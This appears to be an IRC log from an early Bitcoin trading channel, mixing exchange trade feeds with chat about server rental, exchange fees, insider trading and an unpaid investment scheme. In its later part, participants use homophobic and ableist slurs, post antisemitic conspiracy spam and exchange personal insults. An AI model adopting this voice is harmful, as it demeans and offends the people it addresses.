0.0001194 = 0.0041 BTC [+] Aug 21 03:42:45 [MPEX] [F.GIGA.ETF] 893 @ 0.00101249 = 0.9042 BTC [+] Aug 21 03:42:47 [MPEX] [F.GIGA.ETF] 958 @ 0.00101472 = 0.9721 BTC [+] Aug 21 03:42:47 [MPEX] [F.GIGA.ETF] 12331 @ 0.00101837 = 12.5575 BTC [+] Aug 21 03:42:48 [MPEX] [F.GIGA.ETF] 7400 @ 0.00101846 = 7.5366 BTC [+] Aug 21 03:42:49 [MPEX] [F.GIGA.ETF] 18700 @ 0.00102096 = 19.092 BTC [+] Aug 21 03:42:51 [MPEX] [F.GIGA.ETF] 3400 @ 0.0010229 = 3.4779 BTC [+] Aug 21 03:42:52 [MPEX] [F.GIGA.ETF] 2600 @ 0.00103143 = 2.6817 BTC [+] Aug 21 03:42:53 [MPEX] [F.GIGA.ETF] 8260 @ 0.00106279 = 8.7786 BTC [+] Aug 21 03:42:54 [MPEX] [F.GIGA.ETF] 6400 @ 0.00106309 = 6.8038 BTC [+] Aug 21 03:42:55 [MPEX] [F.GIGA.ETF] 5800 @ 0.00106533 = 6.1789 BTC [+] Aug 21 03:42:56 [MPEX] [F.GIGA.ETF] 300 @ 0.00106827 = 0.3205 BTC [+] Aug 21 03:42:56 [MPEX] [F.GIGA.ETF] 2958 @ 0.00108895 = 3.2211 BTC [+] Aug 21 03:43:05 [GLBSE] [FUTUREFUND] 300 @ 0.0001194 = 0.0358 BTC [+] Aug 21 03:43:13 [GLBSE] [BTCMC] 2 @ 0.35000001 = 0.7 BTC [+] Aug 21 03:43:14 [GLBSE] [BTCMC] 12 @ 0.3999 = 4.7988 BTC [+] Aug 21 03:43:20 hey rg Aug 21 03:43:36 [GLBSE] [BTCMC] 2 @ 0.4 = 0.8 BTC [+] Aug 21 03:43:37 [GLBSE] [ASICMINER] 10 @ 0.099 = 0.99 BTC [+] Aug 21 03:43:38 [MPEX] [S.MPOE] 43900 @ 0.00038189 = 16.765 BTC [-] Aug 21 03:43:40 [MPEX] [S.MPOE] 46850 @ 0.00037438 = 17.5397 BTC [-] Aug 21 03:43:41 [MPEX] [S.MPOE] 7697 @ 0.000372 = 2.8633 BTC [-] Aug 21 03:43:41 what would you pay to lease a e3-1230v2 with ipmi, 16gb ram and 2tb disk Aug 21 03:43:42 [MPEX] [S.MPOE] 33616 @ 0.00036336 = 12.2147 BTC [-] Aug 21 03:43:42 [MPEX] [S.MPOE] 5400 @ 0.00036222 = 1.956 BTC [-] Aug 21 03:43:43 in bitcoins Aug 21 03:43:43 [MPEX] [S.MPOE] 17200 @ 0.00036028 = 6.1968 BTC [-] Aug 21 03:43:44 [MPEX] [S.MPOE] 13969 @ 0.00035667 = 4.9823 BTC [-] Aug 21 03:43:45 [MPEX] [S.MPOE] 23398 @ 0.0003563 = 8.3367 BTC [-] Aug 21 03:43:46 [MPEX] [S.MPOE] 3052 @ 0.00035582 = 1.086 BTC [-] Aug 21 03:43:47 [MPEX] [S.MPOE] 4918 @ 0.00035562 = 1.7489 BTC [-] Aug 21 03:43:56 100mbit unmetered Aug 21 03:44:40 Diablo-D3: I rent a very similar setup in Internap NYC for $250/mo, if that's of any use to you Aug 21 03:44:42 [MPEX] [B.MPCD.C] 30000 @ 0.0010223 = 30.669 BTC [+] Aug 21 03:45:43 Azelphur: would you be willing to get that in bitcoins if you could? Aug 21 03:45:44 [GLBSE] [RSM] 1 @ 0.26 BTC [+] Aug 21 03:45:52 [GLBSE] [BDK.BND] 100 @ 0.101 = 10.1 BTC [-] Aug 21 03:46:03 Diablo-D3: if I could pay my current host in bitcoins I would, yea Aug 21 03:47:16 wait. was Diablo-D3 selling it or buying it lol Aug 21 03:47:54 Azelphur: I could get that for you in bitcoins in LA, Chicago, or Dallas, but not NYC Aug 21 03:48:05 none of those locations are of any use to me :p Aug 21 03:48:11 ;;ticker Aug 21 03:48:12 Best bid: 9.9176, Best ask: 10.07, Bid-ask spread: 0.15240, Last trade: 10.08256, 24 hour volume: 178585, 24 hour low: 8.555, 24 hour high: 10.5 Aug 21 03:48:27 and I am also tied to my current host Aug 21 03:48:33 Azelphur: NYC only? too bad Aug 21 03:48:40 yup :p Aug 21 03:48:47 what are you running, like a game server ? Aug 21 03:48:49 I couldn't switch host even if you had exactly the same setup in internap NYC Aug 21 03:48:52 mircea_popescu: yup Aug 21 03:48:53 or why does location matter to you Aug 21 03:48:55 a ok Aug 21 03:48:59 Azelphur: why, paid up for the year? Aug 21 03:49:09 Diablo-D3: valve doesn't support DNS Aug 21 03:49:16 wait, what? Aug 21 03:49:17 loose IP = start from scratch Aug 21 03:49:22 that's so retarded srsly. Aug 21 03:49:25 yep. Aug 21 03:49:29 I really hate it Aug 21 03:49:31 Azelphur: what about valve? Aug 21 03:49:35 why do they even do it. Aug 21 03:49:43 Diablo-D3: they don't support DNS. Aug 21 03:49:57 the only valve I know of makes video games Aug 21 03:50:07 that'd be the one. Aug 21 03:50:21 yup Aug 21 03:50:28 games that require servers Aug 21 03:50:34 servers of which you can only access via the IP address. Aug 21 03:50:45 so why cant you just change your IP? Aug 21 03:50:53 change IP = loose entire player base Aug 21 03:51:02 well not entire, but yeah. Aug 21 03:51:07 close enough :p Aug 21 03:51:26 i think some people managed to forward about half. i think that's the high mark. Aug 21 03:51:42 [GLBSE] [BITBOND] 1 @ 0.3797 BTC [+] Aug 21 03:52:21 thats retarded Aug 21 03:52:35 [MPEX] [B.MPCD.B] 23500 @ 0.001008 = 23.688 BTC [+] Aug 21 03:52:36 [MPEX] [B.MPCD.B] 7708 @ 1.007 = 7761.956 BTC [+] Aug 21 03:52:37 no shit lol Aug 21 03:52:41 yep Aug 21 03:52:43 Azelphur: too bad though, I might be able to get it half what you were paying Aug 21 03:52:48 hehe Aug 21 03:53:01 Diablo-D3: I doubt that tbh, the server I'm on is extremely high quality Aug 21 03:53:06 tier 1 internap bandwidth ain't cheap. Aug 21 03:53:18 100mbps 95% on a gigabit port. Aug 21 03:53:27 lol Aug 21 03:53:29 dedicated 1gbit port. Aug 21 03:53:44 well, if you NEED the full 1gbit, I probably could work a deal Aug 21 03:53:48 [GLBSE] [TYGRR.BOND-P] 6 @ 0.838 = 5.028 BTC [-] Aug 21 03:53:49 [GLBSE] [TYGRR.BOND-P] 48 @ 0.839 = 40.272 BTC [+] Aug 21 03:54:09 what are you running anyway Azelphur ? Aug 21 03:54:27 probably tf2 >_> Aug 21 03:54:33 6 TF2's Aug 21 03:54:35 and a minecraft Aug 21 03:54:39 [GLBSE] [CHEAPERINBITCOINS-STOCKS] 1 @ 0.28999 BTC [+] Aug 21 03:54:42 6 lol Aug 21 03:54:55 I have 100Mbit/s on a gigabit port here at home :-) Aug 21 03:55:11 mircea_popescu: and I get advertising revenue on all of them :) Aug 21 03:55:32 Azelphur how is the gamingmarket btw ? i jhaven't had any interests in there for years now. Aug 21 03:55:35 is it dieing ? Aug 21 03:56:04 [GLBSE] [TYGRR.BOND-P] 10 @ 0.83999999 = 8.4 BTC [+] Aug 21 03:56:04 [GLBSE] [TYGRR.BOND-P] 6 @ 0.84 = 5.04 BTC [+] Aug 21 03:56:22 mircea_popescu: seems fine to me Aug 21 03:56:37 [GLBSE] [KRAKEN] 6 @ 0.01 = 0.06 BTC Aug 21 03:57:32 [GLBSE] [ASICMINER] 20 @ 0.099 = 1.98 BTC [+] Aug 21 03:58:06 oh lol, that paragraph about how they pick the people to be guests on talkshows, then the interviewer belittles that (true) statement by calling it a conspiracy and implying it isn't true Aug 21 03:58:10 lol Aug 21 03:58:18 [GLBSE] [DMC] 83 @ 0.05 = 4.15 BTC [+] Aug 21 03:58:24 Diablo-D3: this is one of the things I like about minecraft, DNS/SRV support OOTB Aug 21 03:58:37 refreshing, I think it's pretty much the only game to have SRV support Aug 21 03:59:06 [GLBSE] [DMC] 2 @ 0.052 = 0.104 BTC [+] Aug 21 04:00:16 Azelphur: you know, tf2 is obsolete now that they've made tf2 in minecraft Aug 21 04:00:22 [GLBSE] [OBSI.HRPT] 6 @ 0.1028 = 0.6168 BTC [+] Aug 21 04:00:22 xD Aug 21 04:00:23 [MPEX] [O.BTCUSD.P080N] 4 @ 0.14282041 = 0.5713 BTC [-] Aug 21 04:00:32 smickles: you know, minecraft is obsolete now they've made minecraft in tf2 Aug 21 04:00:43 have you tried that? tho, it's fun Aug 21 04:00:52 tf2 in minecraft? nope Aug 21 04:00:55 bah so i have one of those back and forth horizontal pipe sprinklers Aug 21 04:01:00 i hope they finish the engi soon, that'll be cool Aug 21 04:01:05 and the pos locked up and it's been watering the same spot for one hour Aug 21 04:01:05 hehe Aug 21 04:01:32 lol smickles has been busy with zappa ? Aug 21 04:01:40 Azelphur: mctf2.com iirc Aug 21 04:01:48 fun Aug 21 04:02:18 mircea_popescu: yeah, i've not kept up on my reading recently, i've lost my speed Aug 21 04:02:33 well that's good matter to work it on hehe Aug 21 04:04:07 [MPEX] [B.MPCD.A] 14400 @ 0.001005 = 14.472 BTC [-] Aug 21 04:04:09 [MPEX] [B.MPCD.A] 185600 @ 0.0010078 = 187.0477 BTC [+] Aug 21 04:05:19 o hey! 30day Total Volume 100`751.39448624 BTC Aug 21 04:05:23 officially over 100k/month nao. Aug 21 04:06:07 [GLBSE] [BDK.BND] 6 @ 0.101 = 0.606 BTC [-] Aug 21 04:07:10 mircea_popescu: http://www.splicd.com/cKKHSAE1gIs/14/17 ? :D Aug 21 04:07:28 [MPEX] [O.HASH.C10TH] 150000 @ 0.00001437 = 2.1555 BTC [-] Aug 21 04:07:39 [GLBSE] [TYGRR.BOND-P] 2 @ 0.85 = 1.7 BTC [+] Aug 21 04:07:40 [GLBSE] [TYGRR.BOND-P] 22 @ 0.85 = 18.7 BTC [+] Aug 21 04:07:42 You need Flash player 8+ and JavaScript enabled to view this video. Aug 21 04:07:46 gimme a summary lol Aug 21 04:07:56 "ONE MEEELION DOLLARS" Aug 21 04:07:59 ehehe Aug 21 04:08:02 o hey yeah! Aug 21 04:08:06 ;;ticker Aug 21 04:08:07 Best bid: 9.802, Best ask: 9.99588, Bid-ask spread: 0.19388, Last trade: 10, 24 hour volume: 173472, 24 hour low: 8.555, 24 hour high: 10.5 Aug 21 04:08:10 xD Aug 21 04:08:23 .py 9.802* 100751.39448624 Aug 21 04:08:24 987565.168754 Aug 21 04:08:28 aaaalmost lol Aug 21 04:08:35 bitcoin y u no go up! Aug 21 04:08:57 haha Aug 21 04:09:10 [GLBSE] [ZETA-MINING] 1 @ 0.18398 BTC [-] Aug 21 04:09:30 dub was giving sgornick the steelsponge, but seriously. with that sort of numbers it wouldn't surprise me someone figured they would like to tax it. Aug 21 04:09:56 after all, everything on this earth is for governments to support themselves. Aug 21 04:11:24 [GLBSE] [ASICMINER] 50 @ 0.099 = 4.95 BTC [+] Aug 21 04:12:37 ;;ticker Aug 21 04:12:37 Best bid: 9.87921, Best ask: 9.94609, Bid-ask spread: 0.06688, Last trade: 9.99589, 24 hour volume: 172366, 24 hour low: 8.555, 24 hour high: 10.5 Aug 21 04:13:13 ;;bids 9 Aug 21 04:13:15 There are currently 10596.56 bitcoins demanded at or over 9.0 USD, worth 97915.2362242 USD in total. Aug 21 04:13:21 ;;asks 10 Aug 21 04:13:23 There are currently 512.41023 bitcoins offered at or under 10.0 USD, worth 5124.1022741 USD in total. Aug 21 04:13:36 i would guess its going up Aug 21 04:13:51 ;;bids 7 Aug 21 04:13:54 There are currently 80806.174 bitcoins demanded at or over 7.0 USD, worth 644763.789915 USD in total. Aug 21 04:13:55 ;;asks 12 Aug 21 04:13:57 There are currently 105105.51 bitcoins offered at or under 12.0 USD, worth 1185536.83872 USD in total. Aug 21 04:14:12 rotf Aug 21 04:14:52 sup rg Aug 21 04:16:11 so has anyone actually been paid by the pirate thing ? Aug 21 04:17:46 [GLBSE] [TYGRR.BOND-P] 1 @ 0.85 BTC [+] Aug 21 04:17:48 [GLBSE] [TYGRR.BOND-P] 136 @ 0.86 = 116.96 BTC [+] Aug 21 04:18:59 [GLBSE] [TYGRR.BOND-P] 2 @ 0.86 = 1.72 BTC [+] Aug 21 04:19:25 [GLBSE] [ASICMINER] 5 @ 0.099 = 0.495 BTC [+] Aug 21 04:20:33 [GLBSE] [ASICMINER] 2 @ 0.099 = 0.198 BTC [+] Aug 21 04:22:48 [GLBSE] [OBSI.HRPT] 8 @ 0.1028 = 0.8224 BTC [+] Aug 21 04:23:34 [GLBSE] [DMC] 5 @ 0.052 = 0.26 BTC [+] Aug 21 04:32:07 lol, someone said that glbse is the cheaper exchange when compared to mpex Aug 21 04:32:33 glbse charges >2x the fee on sales Aug 21 04:33:00 [GLBSE] [JAH] 21 @ 0.1448 = 3.0408 BTC [+] Aug 21 04:33:07 smickles for some reason people will say anything. Aug 21 04:33:23 but there's a good thing : initially rthey charged 0.5% round trip. Aug 21 04:33:25 for anyone doing over 4kbtc in sales, over the LIFETIME of their account, glbse is more expensive Aug 21 04:33:30 a month or two later they dropped half that. Aug 21 04:33:38 initially they were going to charge for transfers of stock Aug 21 04:33:45 mpex did it for free so after a while they relented Aug 21 04:33:55 in general, it's quite clear who's following and who's leading this story. Aug 21 04:34:09 wait a tic, i've been charge to transfer stock there just recently Aug 21 04:34:24 well ya. some people get it for free. Aug 21 04:34:30 you know, the ones creating all the fake volume. Aug 21 04:34:44 There is no fee to transfer bitcoin (BTC) or assets/securities that have a total trade volume of less than 20BTC since IPO. Everything else has a 0.20% BTC fee of the 5 day average price. This fee is not refundable. Aug 21 04:34:51 what's the latest with pirate...? Aug 21 04:35:31 evoorhees_? like the evoorhees_ of s.dice? Aug 21 04:35:54 you've been taking some flack recently haven't you? Aug 21 04:36:14 (sorry, best i know about pirate is that he hasn't paid yet) Aug 21 04:36:30 hehe yeah I have Aug 21 04:36:35 it's okay, part of the market vetting Aug 21 04:36:48 [MPEX] [F.GIGA.ETF] 9400 @ 0.00104061 = 9.7817 BTC [-] Aug 21 04:36:55 evoorhees_ i was trying to find someone who was definitely paid. nobody came forward yet. Aug 21 04:37:11 jcpham said sun he was gonna let me know if he does, hasn't said anything yet either. Aug 21 04:37:17 well, good political ethics are certainly a deal-breaker Aug 21 04:37:19 :P Aug 21 04:37:30 lol Aug 21 04:37:54 smickles i remember that giga was launching and expected to do free pushes to pre-ipo sales Aug 21 04:38:10 then glbse wanted to lock him down. then i offered him to list him, then they waived it. Aug 21 04:38:31 at the time mpex was just a week or two old tho, something like that. Aug 21 04:38:31 No one understands mpex thats why they talk smack about it. Aug 21 04:38:54 Doffx i still don't grasp how people figur they're being part of a cryptocurrency don't get gpg. Aug 21 04:38:57 its weird. Aug 21 04:38:58 It took me hours of questions just to get part of it Aug 21 04:39:10 haha. were you talking to me ? Aug 21 04:39:19 I barely get GPG Aug 21 04:39:20 I think its definitly the more secure and robust exchange Aug 21 04:39:25 but, I'm not a developer Aug 21 04:39:39 evoorhees_ gpg is pretty much vital for citizenship these days. Aug 21 04:39:39 mircea_popescu: did you see the line where someone put up this brand new ltc asset exchange and said that mpex was prolly more likely to get hacked because 'the gui looked worse'? Aug 21 04:39:42 Yeah and you helped me get it mircea_popescu Aug 21 04:39:55 smickles seems about par for the course. Aug 21 04:39:56 i lol'd and pointed out that the ux is a gpg post Aug 21 04:39:59 Not to mention how the bot works to add liquidity Aug 21 04:40:01 not a gui at all Aug 21 04:40:15 Doffx a, i recall, it was mostly the options you were fighting with Aug 21 04:40:36 Yeah but that really helped me understand the whole site and why its better. Aug 21 04:40:37 any interesting hack attempts? Aug 21 04:40:37 [GLBSE] [MMM] 10 @ 0.7 = 7 BTC [+] Aug 21 04:40:45 or did nobody notice it on reddit Aug 21 04:40:57 dub not really. i got a few emails from very clever/considerate people. Aug 21 04:41:06 You need more people on it now, and a brokerage to provide that front end Aug 21 04:41:07 but nobody actually came up with something prizeable. Aug 21 04:41:12 and isnt MMM the name of the biggest ponzi in history? Aug 21 04:41:20 i did get a little benefit from it tho. made some aquiantances etc. Aug 21 04:41:32 dub lol i tihnk so Aug 21 04:41:37 Doffx always need more ppl! Aug 21 04:41:51 mircea_popescu: nobody bet against you :( Aug 21 04:42:10 i didn't bet ? Aug 21 04:42:17 i don't have an account on that bet site. Aug 21 04:42:25 I keep saying we need to open up that 3 day free account trial window! Aug 21 04:42:29 well, bet against your sits security Aug 21 04:42:31 :) Aug 21 04:42:35 sites* Aug 21 04:42:36 dub ya lol. Aug 21 04:42:41 neither did i, i think my account dissapeares with it's <1btc in it Aug 21 04:42:45 Doffx you with betsofbitcoin thingee? Aug 21 04:42:59 No, I dont even think I know what it is. Aug 21 04:43:13 http://www.betsofbitco.in/item?id=566 Aug 21 04:43:16 place your bets Aug 21 04:43:30 ya, after the bitcoindaytrade or w/e it was called debacle Aug 21 04:43:34 Wow thats a losing bet Aug 21 04:43:38 i asked smickles to put an offer on reddit to vet mpex Aug 21 04:44:04 That would be one amazing hack. Aug 21 04:44:09 it would be lol. Aug 21 04:44:16 how does that weighting affect the payout? Aug 21 04:44:22 course if someone got the webserver they'd have nothing much, but i'd still want to see it. Aug 21 04:44:59 I mean, i'd bet a satoshi on that Aug 21 04:45:31 100000000x payout sounds appealing Aug 21 04:45:36 lol Aug 21 04:45:50 Does it count if they go to Romania with a usb drive sneak in the backdoor and download everything? Aug 21 04:46:10 well server isn't in romania Aug 21 04:46:14 1.337 btc isn't worth that much yet Aug 21 04:46:21 CxBTC x 63.30939807 Aug 21 04:46:26 muahaha insider trading! Aug 21 04:46:35 lol rg what ? Aug 21 04:46:35 Hehe, well hell I dont know where it is, that was just best guess. Aug 21 04:46:41 just kidding Aug 21 04:46:47 i told someone in -otc i trade bitvps's stock Aug 21 04:46:51 and they accused me of insider trading Aug 21 04:46:53 ah lol Aug 21 04:47:07 ofc it's insidertrading, but that's not necessarily bad Aug 21 04:47:07 i dont have the smarts for insider trading Aug 21 04:47:08 i don't see how a policy could be made against owner buying his own stock Aug 21 04:47:11 on an anon currency Aug 21 04:47:49 you'd have to use non-public knowledge about the future action of the company to your advantage for it to be a bad thing Aug 21 04:48:01 [MPEX] [B.MPCD.B] 130000 @ 0.0010025 = 130.325 BTC [-] Aug 21 04:48:30 pretty much the only avenue to mess that up would be to issue unwarranted negative guidance Aug 21 04:48:35 then buy up in the slump Aug 21 04:48:40 it'd be a pretty asshole thing to do. Aug 21 04:49:06 [GLBSE] [MATH] 1 @ 0.5 BTC [+] Aug 21 04:49:07 or know that this month had a huge loss, and sell before it became public knowledge Aug 21 04:49:10 btw evoorhees_ i bet a bitcoin on yoru site. i lost it :( Aug 21 04:49:24 there are plenty of other ways to cock it up too Aug 21 04:49:25 smickles that'd hardly fly, you'd get excruciated. Aug 21 04:50:14 i report my actions on s2cm anyway Aug 21 04:50:24 thats actually the best policy i would guess Aug 21 04:51:07 i'm almost SEC compliant actually, we'd just have to actually send documents into the SEC IIRC Aug 21 04:51:33 [MPEX] [S.MPOE] 48482 @ 0.00035562 = 17.2412 BTC [-] Aug 21 04:51:35 [MPEX] [S.MPOE] 7426 @ 0.00035499 = 2.6362 BTC [-] Aug 21 04:51:36 [MPEX] [S.MPOE] 900 @ 0.00035451 = 0.3191 BTC [-] Aug 21 04:51:37 [MPEX] [S.MPOE] 17034 @ 0.0003536 = 6.0232 BTC [-] Aug 21 04:51:46 [GLBSE] [FPGA-IPCORE-DEV] 8 @ 0.1498 = 1.1984 BTC [-] Aug 21 04:51:55 but we actually fall well under the numerical minimums Aug 21 04:52:03 what are they now ? Aug 21 04:52:06 i don't even recall. Aug 21 04:52:16 [GLBSE] [FPGA-IPCORE-DEV] 15 @ 0.1499 = 2.2485 BTC [+] Aug 21 04:52:17 about 3 pages of interwoven rules Aug 21 04:52:24 just on that one topic Aug 21 04:52:38 hey jcpham did you get paid yet ? Aug 21 04:53:06 [GLBSE] [FPGA-IPCORE-DEV] 2 @ 0.15499999 = 0.31 BTC [+] Aug 21 04:53:14 mircea_popescu hahahaha sucker Aug 21 04:53:19 lmao Aug 21 04:53:29 bet again, I'm sure it'll work Aug 21 04:53:37 man rg is going to kill me if he finds out Im competing with him Aug 21 04:53:45 lol Aug 21 04:53:51 [GLBSE] [FPGA-IPCORE-DEV] 10 @ 0.15999999 = 1.6 BTC [+] Aug 21 04:54:06 [MPEX] [S.MPOE] 5600000 @ 0.000389 = 2178.4 BTC [+] Aug 21 04:54:14 Diablo-D3: a vps company? Aug 21 04:54:16 [GLBSE] [FPGA-IPCORE-DEV] 3 @ 0.18199999 = 0.546 BTC [+] Aug 21 04:54:18 evoorhees_: that is basically funny, made me laugh anyway Aug 21 04:54:34 who ISNT competing with rg lol Aug 21 04:54:37 [GLBSE] [FPGA-IPCORE-DEV] 5 @ 0.18299999 = 0.915 BTC [+] Aug 21 04:54:40 no shit Aug 21 04:54:49 no Aug 21 04:54:50 but if you're planning on opening up a VPS company Aug 21 04:54:52 "good luck" Aug 21 04:54:55 not vps yet Aug 21 04:54:57 [GLBSE] [FPGA-IPCORE-DEV] 8 @ 0.18399999 = 1.472 BTC [+] Aug 21 04:54:58 just dedis. Aug 21 04:55:02 dedis for bitcoins Aug 21 04:55:05 one good thin about diablo-d3 is Aug 21 04:55:09 Diablo-D3 is this part of dmc ? Aug 21 04:55:10 he never gets anything off the ground Aug 21 04:55:15 so im not worried Aug 21 04:55:18 [GLBSE] [FPGA-IPCORE-DEV] 10 @ 0.18499999 = 1.85 BTC [+] Aug 21 04:55:19 mircea_popescu: it will be I think Aug 21 04:55:23 rg aww why teh hate Aug 21 04:55:24 ouch Aug 21 04:55:35 [GLBSE] [FPGA-IPCORE-DEV] 15 @ 0.18999999 = 2.85 BTC [+] Aug 21 04:55:37 so yeah someone hates against me and i hate back Aug 21 04:55:40 and people are like WHY rg Aug 21 04:55:41 pff Aug 21 04:55:43 :D Aug 21 04:55:50 it's just cause we like you. Aug 21 04:55:53 [GLBSE] [FPGA-IPCORE-DEV] 20 @ 0.19999999 = 4 BTC [+] Aug 21 04:55:58 you can have the dedi market Aug 21 04:55:59 tbh Aug 21 04:56:03 i sold a ton of dedis Aug 21 04:56:05 btw, did anyone here know that porn exists ? Aug 21 04:56:10 [GLBSE] [FPGA-IPCORE-DEV] 2 @ 0.2 = 0.4 BTC [+] Aug 21 04:56:11 [GLBSE] [FPGA-IPCORE-DEV] 7 @ 0.2 = 1.4 BTC [+] Aug 21 04:56:11 i am very shocked myself to discover Aug 21 04:56:16 and they were all major pains in the ass Aug 21 04:56:17 that such abominations soil the interwebs Aug 21 04:56:20 rg: I didnt hate against you Aug 21 04:56:26 rg, you're cool, you gave me about 8 btc oneday for a sandwich Aug 21 04:56:27 let me see Aug 21 04:56:30 nenolod did and I just stood in the background eating popcorn Aug 21 04:56:32 [GLBSE] [FPGA-IPCORE-DEV] 2 @ 0.2 = 0.4 BTC [+] Aug 21 04:56:45 who's nenolod even ?! Aug 21 04:56:48 [GLBSE] [FPGA-IPCORE-DEV] 30 @ 0.22999999 = 6.9 BTC [+] Aug 21 04:56:54 rg: no, I said fuck s.bvps Aug 21 04:56:55 nenolod is one of the admins at my DC Aug 21 04:57:14 o i c Aug 21 04:57:15 rg: dude, hes an admin or developer or whatever of EVERYTHING Aug 21 04:57:21 he wasn't hating on you, he was hating on me Aug 21 04:57:24 considering nenolod is the cause of our data failure Aug 21 04:57:25 Diablo-D3 you asshole! Aug 21 04:57:26 the other week Aug 21 04:57:29 i think you backed the wrong pony Aug 21 04:57:36 I bet if I look closely enough his signature is on the declination of independence Aug 21 04:57:40 [GLBSE] [FPGA-IPCORE-DEV] 40 @ 0.23999999 = 9.6 BTC [+] Aug 21 04:57:42 you know that DC admin who unplugged the hard drive from a working system? Aug 21 04:57:44 teh ahahaha Aug 21 04:57:45 yeah Aug 21 04:57:47 now you know Aug 21 04:57:51 rg: no, thats not what happened Aug 21 04:57:53 rg i do that all the time. Aug 21 04:58:04 cheaper than those fancy wiping software things Aug 21 04:58:09 umm yeah it is Aug 21 04:58:13 and when i said WHAT THE FUK ARE YOU DOIN Aug 21 04:58:14 [GLBSE] [FPGA-IPCORE-DEV] 40 @ 0.24769999 = 9.908 BTC [+] Aug 21 04:58:14 he says Aug 21 04:58:18 have to shake the drive well while it slows too Aug 21 04:58:20 'well, you didn't tell me NOT to do it.. so its your fault' Aug 21 04:58:21 remember the scene near the end of blues brothers where they finally make it to dailey plaza and the bluesmobil falls apart? Aug 21 04:58:32 oh man Aug 21 04:58:33 no Aug 21 04:58:36 after hearing that Aug 21 04:58:37 thats what happened. Aug 21 04:58:43 [GLBSE] [FPGA-IPCORE-DEV] 50 @ 0.2477 = 12.385 BTC [+] Aug 21 04:58:45 mircea_popescu: THE FUCK MAN Aug 21 04:58:47 DO NO SHAKE THE DRIVE Aug 21 04:58:51 i should check and see of my minecraft stuff is still running Aug 21 04:58:53 you know nothing. Aug 21 04:58:56 HEAD PARKING IS NOT A CHALLENGE Aug 21 04:59:03 this is sparta. Aug 21 04:59:12 hrm, fees changed on glbse Aug 21 04:59:17 when was that? Aug 21 04:59:17 again ? Aug 21 04:59:23 again? what? Aug 21 04:59:25 are they lower? Aug 21 04:59:25 in the last 20 min? Aug 21 04:59:29 lol Aug 21 04:59:36 no, I havent looked for months Aug 21 04:59:42 lool Aug 21 04:59:45 last time I noticed it was 20, 20, and 50 Aug 21 04:59:45 last i heard was .5% one way. Aug 21 04:59:49 [GLBSE] [FPGA-IPCORE-DEV] 2 @ 0.25 = 0.5 BTC [+] Aug 21 04:59:54 used to be 0.02%, now 0.01% Aug 21 04:59:59 waht ?! Aug 21 05:00:01 ahahaha get out ? Aug 21 05:00:01 or is it account based? Aug 21 05:00:03 [GLBSE] [FPGA-IPCORE-DEV] 5 @ 0.36 = 1.8 BTC [+] Aug 21 05:00:07 BS Aug 21 05:00:14 or is it 0.2 0.1 Aug 21 05:00:21 i get charged 0.005% Aug 21 05:00:24 wtf? Aug 21 05:00:35 sorry, I meant 50 50 20 Aug 21 05:00:37 Basis Point(BP): 1/100th of 1% or 0.01% Aug 21 05:00:38 and thats what it still is Aug 21 05:00:46 dub: yes, and these are in BPs Aug 21 05:00:55 er Aug 21 05:00:55 oh Aug 21 05:00:57 [GLBSE] [FPGA-IPCORE-DEV] 5 @ 0.385 = 1.925 BTC [+] Aug 21 05:00:57 nix that % Aug 21 05:00:58 I see Aug 21 05:00:58 so 0.5% Aug 21 05:01:07 i get charged 0.5% Aug 21 05:01:09 I forgot Aug 21 05:01:12 did pirate even pay out today? Aug 21 05:01:13 i went to bed Aug 21 05:01:18 rg not so far Aug 21 05:01:18 i got sick of people asking did pirate pay Aug 21 05:01:22 not that i've heard Aug 21 05:01:24 not even a bit? Aug 21 05:01:29 man Aug 21 05:01:30 well we don't really know. Aug 21 05:01:32 wheres btc-mining Aug 21 05:01:35 he forgot to pay dividends Aug 21 05:01:35 not being invested. Aug 21 05:01:45 Diablo-D3: scam Aug 21 05:01:48 SCAM Aug 21 05:01:50 PONZI Aug 21 05:01:51 PIRATE Aug 21 05:01:52 9/11 Aug 21 05:01:56 JEWSSSSSSSSSSSSSSS Aug 21 05:02:08 so in the end what's the glbse fee ? Aug 21 05:02:18 mircea_popescu: 0.5% Aug 21 05:02:36 ______ /~~~, ********************************************* Aug 21 05:02:38 [GLBSE] [FPGA-IPCORE-DEV] 60 @ 0.39999999 = 24 BTC [+] Aug 21 05:02:39 diablo: what's your company gonna be called Aug 21 05:02:39 ___/`_____\---------/____/ """//// //.....******..********.******CHEMTRAILS---------------FORCED VACCINATIONS Aug 21 05:02:42 Diablo Server Company Aug 21 05:02:42 ~(___________ <======: (___] =====-----FEMA CAMPS-----------------****-----NEW WORLD ORDER--------------,,,,, Aug 21 05:02:45 `-----------~` ,,,\\\ \\\````` ***********--NORTH AMERICAN UNION-----************************* Aug 21 05:02:47 rg: probably exelion Aug 21 05:02:48 *** *8*****GLOBAL GOVERNMENT****************,, Aug 21 05:02:51 ****** Aug 21 05:02:53 [GLBSE] [FPGA-IPCORE-DEV] 20 @ 0.39999999 = 8 BTC [+] Aug 21 05:02:54 btw Aug 21 05:02:55 that is ...s o gay Aug 21 05:02:55 dub: your ascii isnt working Aug 21 05:03:01 yes, it is Aug 21 05:03:02 i was in an efnet takeover group Aug 21 05:03:05 and our name was Exelon Aug 21 05:03:08 your client fails Aug 21 05:03:08 [GLBSE] [FPGA-IPCORE-DEV] 10 @ 0.39999999 = 4 BTC [+] Aug 21 05:03:21 dub: I dont think my client is wide enough Aug 21 05:03:24 pastebin that or something Aug 21 05:03:29 your mom certainly is Aug 21 05:03:30 copumpkin: what timezone was our contract meant to be in? Aug 21 05:03:44 dub: my mom is dying of cancer, but thanks for playing. Aug 21 05:03:49 [GLBSE] [FPGA-IPCORE-DEV] 3 @ 0.39999999 = 1.2 BTC [+] Aug 21 05:03:50 I knew that Aug 21 05:03:50 oh fuck you Aug 21 05:03:51 smickles: not sure, I'll just send you the shit Aug 21 05:03:56 you cant lay that onh im Aug 21 05:04:00 kk Aug 21 05:04:00 piece of shit Aug 21 05:04:18 rg: did you chat hard on efnut? Aug 21 05:04:28 Diablo is the type of guy who talks shit all day Aug 21 05:04:31 copumpkin lives. Aug 21 05:04:33 and wait sfor someone to say something about his mom Aug 21 05:04:37 so he can say shes dying of cancer Aug 21 05:04:47 < dub> rg: did you chat hard on efnut? << i do not understand that line Aug 21 05:04:54 rg: ask nenolod, Im not kidding Aug 21 05:04:56 used to Aug 21 05:05:01 >efnut Aug 21 05:05:06 i only go on efnet for #boston now Aug 21 05:05:06 I was an efnet oper once Aug 21 05:05:13 and even those visits are short Aug 21 05:05:14 [GLBSE] [FPGA-IPCORE-DEV] 1 @ 0.39999999 BTC [+] Aug 21 05:05:23 I killed an oper because he was acting like a fag. Aug 21 05:05:27 I 